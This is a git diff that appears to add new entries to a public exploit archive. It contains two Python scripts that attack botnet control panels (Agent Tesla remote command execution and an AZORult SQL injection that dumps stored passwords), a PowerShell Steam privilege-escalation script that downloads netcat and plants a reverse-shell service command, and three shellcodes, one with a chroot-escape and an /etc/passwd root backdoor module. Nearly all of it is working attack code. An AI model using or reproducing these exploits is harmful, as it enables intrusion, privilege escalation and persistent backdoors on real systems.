diff --git a/exploits/php/remote/47243.py b/exploits/php/remote/47243.py new file mode 100755 index 000000000..347457005 --- /dev/null +++ b/exploits/php/remote/47243.py @@ -0,0 +1,54 @@ +import requests +import argparse +import base64 + +# Agent Tesla C2 RCE by prsecurity +# For research purposes only. Don't pwn what you don't own. + +def get_args(): + parser = argparse.ArgumentParser( + prog="agent_tesla_sploit.py", + formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50), + epilog= ''' + This script will exploit the RCE/SQL vulnerability in Agent Tesla Dashboard. + ''') + parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/WebPanel/)") + parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)") + parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)") + args = parser.parse_args() + return args + +def pwn_target(target, command, proxy): + requests.packages.urllib3.disable_warnings() + proxies = {'http': proxy, 'https': proxy} + print('[*] Probing...') + get_params = { + 'table':'screens', + 'primary':'HWID', + 'clmns':'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}', + 'where': base64.b64encode("1=1 UNION SELECT \"{}\"".format(command).encode('utf-8')) + } + target = target + '/server_side/scripts/server_processing.php' + try: + r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies) + print("[*] Your IP: {}".format(r.text)) + headers = { + "User-agent":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" + } + r = requests.get(target, params=get_params, headers=headers, verify=False, proxies=proxies) + result = r.json()['data'][-1]['HWID'] + print('[+] {}'.format(result)) + except: + print("[-] ERROR: Something went wrong.") + print(r.text) + raise + +def main(): + print () + print ('Agent Tesla RCE by prsecurity.') + args = get_args() + pwn_target(args.target.strip(), args.command.strip(), args.proxy.strip()) + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/remote/47244.py b/exploits/php/remote/47244.py new file mode 100755 index 000000000..a9de00a79 --- /dev/null +++ b/exploits/php/remote/47244.py @@ -0,0 +1,95 @@ +import requests +import argparse +import base64 + +# Azorult 3.3.1 C2 SQLi by prsecurity +# For research purposes only. Don't pwn what you don't own. +# change GUID and XOR key to specific beacon, can be extracted from a sample + +guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F" +key = "\x03\x55\xae" + +def get_args(): + parser = argparse.ArgumentParser( + prog="azorult_sploit.py", + formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50), + epilog= ''' + This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard. + ''') + parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)") + parser.add_argument("-n", "--id_record", default="1", help="id of record to dump") + parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)") + args = parser.parse_args() + return args + +def CB_XORm(data, key): + j=0 + key = list(key) + data = list(data) + tmp = list() + for i in range(len(data)): + tmp.append(chr(ord(data[i])^ord(key[j]))) + j += 1 + if j > (len(key)-1): + j = 0 + return "".join(tmp) + +def pwn_target(target, num_records, proxy): + requests.packages.urllib3.disable_warnings() + proxies = {'http': proxy, 'https': proxy} + + try: + r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies) + print("[*] Your IP: {}".format(r.text)) + headers = { + "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" + } + print('[+] Getting URL, LOGIN AND PASS') + data = [ + "|".join([ + "1","2","3","4","5","6","7","8","9","10","11","12" + ]), + "\r\n".join([ + "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)]) + ]), + "c", + "d", + ":".join(["'11","22"]) + ] + payload = CB_XORm(guid.join(data), key) + r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies) + if r.text != "OK": + print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?") + raise + print('[+] Getting LOGIN/PASS') + data = [ + "|".join([ + "1","2","3","4","5","6","7","8","9","10","11","12" + ]), + "\r\n".join([ + "|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)]) + ]), + "c", + "d", + ":".join(["'11","22"]) + ] + payload = CB_XORm(guid.join(data), key) + r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies) + if r.text != "OK": + print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?") + raise + print('[+] If this worked, you will see two new records in password table at guest.php') + except: + print("[-] ERROR: Something went wrong.") + print(r.text) + raise + +def main(): + print () + print ('Azorult 3.3.1 SQLi by prsecurity') + args = get_args() + pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip()) + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/windows/local/47238.ps1 b/exploits/windows/local/47238.ps1 new file mode 100644 index 000000000..6502574f8 --- /dev/null +++ b/exploits/windows/local/47238.ps1 @@ -0,0 +1,30 @@ +$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" +$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" +$RegDir = "C:\Windows\Temp\RegLN.exe" +$PayDir = "C:\Windows\Temp\payload.exe" +$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe" +$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe" +$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe" +$WebClient = New-Object System.Net.WebClient + + +If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir))) +{ +$WebClient.DownloadFile($PayDownload, $PayDir) +$WebClient.DownloadFile($RegDownload, $RegDir) +} + +If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue) +{ +Start-Service -DisplayName "Steam Client Service" +Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload +Start-Service -Name "msiserver" +} +Else +{ +Remove-Item -Path $SteamRegKey -Recurse +Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver" +Start-Service -DisplayName "Steam Client Service" +Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload +Start-Service -Name "msiserver" +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 64afad563..67775d97a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10631,6 +10631,7 @@ id,file,description,date,author,type,platform,port 47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple, 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows, 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux, +47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17603,6 +17604,8 @@ id,file,description,date,author,type,platform,port 47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple, 47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple, 47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux, +47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php, +47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 952e28d54..ddac87adc 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -993,3 +993,6 @@ id,file,description,date,author,type,platform 47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86 47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86 47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86 +47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux +47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86 +47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + BreakĀ­ Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86 diff --git a/shellcodes/linux/47239.c b/shellcodes/linux/47239.c new file mode 100644 index 000000000..2d6b30bdc --- /dev/null +++ b/shellcodes/linux/47239.c @@ -0,0 +1,49 @@ +/* Alpha (AXP) Linux/Tru64 execve() shellcode +* ========================================== +* This shellcode uses the stack to store a generated +* "callsys" instruction, due to this it needs executable +* stack. To test on Linux use "execstack -s " and +* on Tru64 use "sysconfig -r proc executable_stack=1". +* +* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic +* +* -- Hacker Fantastic (https://hacker.house) +*/ +#include +#include + +unsigned char shellcode[] = { + "\x80\xff\xde\x23" /* lda $sp,-128($sp) */ + "\x73\x68\x3f\x24" /* ldil $1, 0x68732f2f */ + "\x2f\x2f\x21\x20" /* sll $1, 0x20 */ + "\x21\x17\x24\x48" /* ldil $2, 0x6e69622f */ + "\x69\x6e\x5f\x24" /* addq $1, $2, $1 */ + "\x2f\x62\x42\x20" /* stq $31, -32($sp) */ + "\x01\x04\x22\x40" /* stq $31, -24($sp) */ + "\xe0\xff\xfe\xb7" /* stq $31, -8($sp) */ + "\xe8\xff\xfe\xb7" /* stq $1, -16($sp) */ + "\xf8\xff\xfe\xb7" /* mov $sp, $16 */ + "\xf0\xff\x3e\xb4" /* subq $16, 0x10, $16 */ + "\x10\x04\xfe\x47" /* stq $16, -40($sp) */ + "\x30\x15\x02\x42" /* mov $sp, $17 */ + "\xd8\xff\x1e\xb6" /* subq $17, 0x28, $17 */ + "\x11\x04\xfe\x47" /* mov $sp, $18 */ + "\x31\x15\x25\x42" /* subq $18, 0x18, $18 */ + "\x12\x04\xfe\x47" /* ldil $0, 0xffffff3c */ + "\x32\x15\x43\x42" /* ldil $1, 0xffffff01 */ + "\x3c\xff\x1f\x20" /* subq $0, $1, $0 */ + "\x01\xff\x3f\x20" /* ldil $1, 0xffffff84 */ + "\x20\x05\x01\x40" /* ldil $2, 0xffffff01 */ + "\x84\xff\x3f\x20" /* subq $1, $2, $1 */ + "\x01\xff\x5f\x20" /* stl $1, -48($sp) */ + "\x21\x05\x22\x40" /* subq $sp, 0x30, $sp */ + "\xd0\xff\x3e\xb0" /* jmp $sp,($sp),0xff10 */ + "\x3e\x15\xc6\x43" + "\xc4\x3f\xde\x6b" +}; + +int main(){ + int (*func)(); + func = (int (*)())shellcode; + func(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/47240.S b/shellcodes/linux_x86/47240.S new file mode 100644 index 000000000..44307cd16 --- /dev/null +++ b/shellcodes/linux_x86/47240.S @@ -0,0 +1,67 @@ +# tolower() execve() /bin/sh -c (user supplied command) +# shellcode to evade tolower() and friends, requires %esi +# to reference a valid writeable address (usually does) +.text + .global _start +_start: + jmp data + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop + nop +start: + popl %edi + movl %edi, %ecx + xorl %eax,%eax + movl %eax,%es:(%esi) + pushl %es:(%esi) + pushl $0x68732f2f + pushl $0x6e69622f + movl %esp,%ebx + movl %eax,%es:(%esi) + pushl %es:(%esi) + pushw $0x632d + movl %esp,%edi + movl %eax,%es:(%esi) + pushl %es:(%esi) + movl %ecx,%eax + movl %eax,%es:(%esi) + pushl %es:(%esi) + movl %edi,%eax + movl %eax,%es:(%esi) + pushl %es:(%esi) + movl %ebx,%eax + movl %eax,%es:(%esi) + pushl %es:(%esi) + movl %esp,%esi + movl %esi,%ecx + xorl %eax, %eax + movb $0x08, %al + addb $0x03, %al + int $0x80 +data: + call start + #command +.ascii "id" \ No newline at end of file diff --git a/shellcodes/linux_x86/47242.asm b/shellcodes/linux_x86/47242.asm new file mode 100644 index 000000000..53d1ed903 --- /dev/null +++ b/shellcodes/linux_x86/47242.asm @@ -0,0 +1,204 @@ +;# Description: SCORE - The ShellCORE +;# score is a complete shellcode for x86 processors running +;# linux. It is designed to help work further with an exploited +;# process. +;# +;# Coded by: prdelka + +;######################### +;# [CORE] # +;######################### + +;--- NOP Equivalent instruction + cld + cld + cld + cld + cld + cld + cld + cld + cld + cld + cld + cld + +;--- core initialise + jmp $+0x06 + pop edi + push edi + jmp edi + call $-0x04 +;--- core prompt + pop edi + push 0x3e0a7964 + push 0x61655220 + push 0x65726f43 + xor eax,eax + mov al,0x4 + xor ebx,ebx + mov bl,0x1 + mov ecx,esp + xor edx,edx + mov dl,0xc + int 0x80 +;--- core read choice + xor eax,eax + mov ebp,esp + push eax + mov al,0x3 + xor ebx,ebx + mov bl,0x1 + mov ecx,ebp + xor edx,edx + mov dl,0x2 + int 0x80 +;--- core module selector + mov edx,ebp + +;### [backdoor module] 'b' + cmp word[edx],0x0a62 + je $+0x5e +;### [break-chroot-jail module] 'j' + cmp word[edx],0x0a6a + je $+0x59 +;### [privilege restore module] 'p' + cmp word[edx],0x0a70 + je $+0x37 +;### [shellcode module] 's' + cmp word[edx],0x0a73 + je $+0x14 +;### [exit module] 'x' + cmp word[edx],0x0a78 + je $+0x05 +;--- core loop + push edi + jmp edi + +;######################### +;# [MODULES] # +;######################### + +;--- [exit module] + xor eax,eax + mov al,0x1 + xor ebx,ebx + int 0x80 + +;--- [shellcode module] + xor eax,eax + push eax + push 0x68732f2f + push 0x6e69622f + mov ebx,esp + push eax + mov edx,esp + push ebx + mov ecx,esp + mov al,0xB + int 0x80 +;### [core loop] + push edi + jmp edi + +;--- [privilege restore module] + xor eax,eax + mov ah,0x17 + shr eax,0x8 + xor ebx,ebx + int 0x80 + xor eax,eax + mov ah,0x2e + shr eax,0x8 + xor ebx,ebx + int 0x80 +;### [core loop] + push edi + jmp edi + +;### [LONG backdoor module jump] + jmp $+0x46 + +;--- [break-chroot-jail] + xor eax,eax + push eax + push 0x6c69616a + mov ebx,esp + mov edx,esp + mov cx,0x2F3 + mov al,0x27 + int 0x80 + xor eax,eax + push eax + mov ebx,edx + mov al,0x3d + int 0x80 + push 0x2e2e2e2e + mov ebx,esp + add bl,0x2 + mov edx,ebx + xor ecx,ecx + mov cl,0xff + mov al,0x0c + mov ebx,edx + int 0x80 + loop $-0x06 + mov ebx,edx + add bl,0x1 + mov al,0x3d + int 0x80 +;### [core loop] + push edi + jmp edi + +;--- [backdoor module] + xor eax,eax + push eax + push 0x64777373 + push 0x61702f2f + push 0x6374652f + mov esi,esp + xor edx,edx + xor ecx,ecx + mov cl,0x01 + mov ebx,esi + xor eax,eax + mov al,0x5 + int 0x80 + push eax + mov esi,esp + xor eax,eax + mov al,0x13 + mov ebx,[esi] + xor ecx,ecx + xor edx,edx + mov dl,0x2 + int 0x80 + xor eax,eax + mov al,0x4 + mov ebx,[esi] + xor ecx,ecx + push ecx + push 0x0a687361 + push 0x622f6e69 + push 0x622f3a74 + push 0x6f6f722f + push 0x3a676663 + push 0x20726f66 + push 0x20726573 + push 0x75206d65 + push 0x74737973 + push 0x3a303a30 + push 0x3a3a6766 + push 0x63737973 + mov ecx,esp + xor edx,edx + mov dl,0x30 + int 0x80 + xor eax,eax + mov al,0x6 + mov ebx,[esi] + int 0x80 +;### [core loop] + push edi + jmp edi \ No newline at end of file